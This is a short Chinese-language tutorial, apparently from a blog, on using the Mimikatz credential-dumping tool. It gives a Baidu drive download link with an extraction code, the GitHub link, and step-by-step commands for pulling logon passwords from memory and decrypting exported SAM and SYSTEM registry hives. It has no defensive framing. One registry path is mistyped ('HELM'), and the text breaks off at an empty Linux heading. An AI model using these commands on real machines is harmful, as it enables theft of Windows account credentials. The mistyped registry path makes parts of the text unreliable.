一、前言:
Mimikatz
一款密码抓取抓取神器,除了抓取密码之外,听说还可以导出谷歌浏览器的密码,当然第二种我也不会
二、Mimikatz下载
百度网盘:
链接:
https://pan.baidu.com/s/166t4E-SfvHyDwuxlfq6wTw
提取码:
3azc
Github:
https://github.com/gentilkiwi/mimikatz
三、
Mimikatz
基本用法
mimikatz # log
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
Windows
使用方法
抓取本地
SAM
文件中的密码从注册表中导出
Reg save HELM/System sys.hiv //
获取
System
注册表信息,导出为
sys.hiv
Reg save HELM/SAM sam.hiv //
获取
Sam
注册表信息,导出为
Sam.hiv
用Mimikatz
解密
sam
、
sys
这俩个文件
Privilege::debug //
提升权限
lsadump::sam /sam:sam.hiv /system:sys.hiv //
运行
利用
powershell
执行
Mimikatz.exe “privilege::debug” “sekurlsa::logonpasswords” exit > 1.txt
Linux
基本使用方法